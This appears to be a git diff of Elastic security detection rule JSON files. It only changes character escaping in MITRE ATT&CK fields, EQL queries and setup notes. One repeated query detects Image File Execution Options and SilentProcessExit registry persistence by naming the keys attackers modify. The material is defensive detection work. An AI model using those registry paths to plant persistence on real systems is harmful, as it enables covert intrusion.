+60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_102.json b/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_102.json index 3a7c848facf..60ad2199215 100644 --- a/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_102.json +++ b/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_102.json @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_103.json b/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_103.json index b40057b4b6f..846eaf0de9d 100644 --- a/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_103.json +++ b/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_103.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_104.json b/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_104.json index 2133244fe54..f66b6a779e2 100644 --- a/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_104.json +++ b/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_104.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_105.json b/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_105.json index 2a3c4f034a8..903eed30b03 100644 --- a/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_105.json +++ b/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_105.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_206.json b/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_206.json index 7d082f8465b..5f01c0fcc6d 100644 --- a/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_206.json +++ b/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_206.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_105.json b/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_105.json index 4bd5ee7b721..03a2876bdb2 100644 --- a/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_105.json +++ b/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_105.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_106.json b/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_106.json index 07f0f82cb0d..8447b5c725c 100644 --- a/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_106.json +++ b/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_106.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_107.json b/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_107.json index 9cb07332436..efcdb784da1 100644 --- a/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_107.json +++ b/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_107.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_108.json b/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_108.json index 420dedd6311..c8558f7b600 100644 --- a/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_108.json +++ b/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_108.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_109.json b/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_109.json index 3a90bc12415..bfffe4fe526 100644 --- a/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_109.json +++ b/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_109.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_110.json b/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_110.json index 104d512de49..0cec37aefdb 100644 --- a/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_110.json +++ b/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_110.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_102.json b/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_102.json index ac3f3730793..38230f5aa42 100644 --- a/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_102.json +++ b/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_102.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Image File Execution Options Injection", - "query": "registry where host.os.type == \"windows\" and length(registry.data.strings) \u003e 0 and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\"\n ) and\n /* add FPs here */\n not registry.data.strings regex~ (\"\"\"C:\\\\Program Files( \\(x86\\))?\\\\ThinKiosk\\\\thinkiosk\\.exe\"\"\", \"\"\".*\\\\PSAppDeployToolkit\\\\.*\"\"\")\n", + "query": "registry where host.os.type == \"windows\" and length(registry.data.strings) > 0 and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\"\n ) and\n /* add FPs here */\n not registry.data.strings regex~ (\"\"\"C:\\\\Program Files( \\(x86\\))?\\\\ThinKiosk\\\\thinkiosk\\.exe\"\"\", \"\"\".*\\\\PSAppDeployToolkit\\\\.*\"\"\")\n", "references": [ "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/" ], @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_103.json b/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_103.json index 44f5a90287e..e2792d5d3ce 100644 --- a/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_103.json +++ b/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_103.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Image File Execution Options Injection", - "query": "registry where host.os.type == \"windows\" and length(registry.data.strings) \u003e 0 and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\"\n ) and\n /* add FPs here */\n not registry.data.strings regex~ (\"\"\"C:\\\\Program Files( \\(x86\\))?\\\\ThinKiosk\\\\thinkiosk\\.exe\"\"\", \"\"\".*\\\\PSAppDeployToolkit\\\\.*\"\"\")\n", + "query": "registry where host.os.type == \"windows\" and length(registry.data.strings) > 0 and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\"\n ) and\n /* add FPs here */\n not registry.data.strings regex~ (\"\"\"C:\\\\Program Files( \\(x86\\))?\\\\ThinKiosk\\\\thinkiosk\\.exe\"\"\", \"\"\".*\\\\PSAppDeployToolkit\\\\.*\"\"\")\n", "references": [ "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/" ], @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_104.json b/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_104.json index 89d606c98ac..37aa1c9ab2a 100644 --- a/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_104.json +++ b/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_104.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Image File Execution Options Injection", - "query": "registry where host.os.type == \"windows\" and length(registry.data.strings) \u003e 0 and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\"\n ) and\n /* add FPs here */\n not registry.data.strings regex~ (\"\"\"C:\\\\Program Files( \\(x86\\))?\\\\ThinKiosk\\\\thinkiosk\\.exe\"\"\", \"\"\".*\\\\PSAppDeployToolkit\\\\.*\"\"\")\n", + "query": "registry where host.os.type == \"windows\" and length(registry.data.strings) > 0 and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\"\n ) and\n /* add FPs here */\n not registry.data.strings regex~ (\"\"\"C:\\\\Program Files( \\(x86\\))?\\\\ThinKiosk\\\\thinkiosk\\.exe\"\"\", \"\"\".*\\\\PSAppDeployToolkit\\\\.*\"\"\")\n", "references": [ "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/" ], @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_105.json b/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_105.json index 8e049eac5f3..6feb8e4c560 100644 --- a/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_105.json +++ b/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_105.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Image File Execution Options Injection", - "query": "registry where host.os.type == \"windows\" and length(registry.data.strings) \u003e 0 and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\"\n ) and\n /* add FPs here */\n not registry.data.strings regex~ (\"\"\"C:\\\\Program Files( \\(x86\\))?\\\\ThinKiosk\\\\thinkiosk\\.exe\"\"\", \"\"\".*\\\\PSAppDeployToolkit\\\\.*\"\"\")\n", + "query": "registry where host.os.type == \"windows\" and length(registry.data.strings) > 0 and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\"\n ) and\n /* add FPs here */\n not registry.data.strings regex~ (\"\"\"C:\\\\Program Files( \\(x86\\))?\\\\ThinKiosk\\\\thinkiosk\\.exe\"\"\", \"\"\".*\\\\PSAppDeployToolkit\\\\.*\"\"\")\n", "references": [ "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/" ], @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -75,7 +75,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_101.json b/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_101.json index 147d28d38cd..fc3bb03ea0a 100644 --- a/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_101.json +++ b/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_101.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_102.json b/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_102.json index 0648a5d258b..f79853e76f7 100644 --- a/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_102.json +++ b/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_103.json b/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_103.json index a38c35a893a..162f1213449 100644 --- a/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_103.json +++ b/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_103.json @@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "68921d85-d0dc-48b3-865f-43291ca2c4f2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_104.json b/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_104.json index 2155e6e26ca..79bb4e372e8 100644 --- a/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_104.json +++ b/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_104.json @@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "68921d85-d0dc-48b3-865f-43291ca2c4f2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_105.json b/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_105.json index 8b488a2c309..336724f6eab 100644 --- a/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_105.json +++ b/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_105.json @@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "68921d85-d0dc-48b3-865f-43291ca2c4f2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to 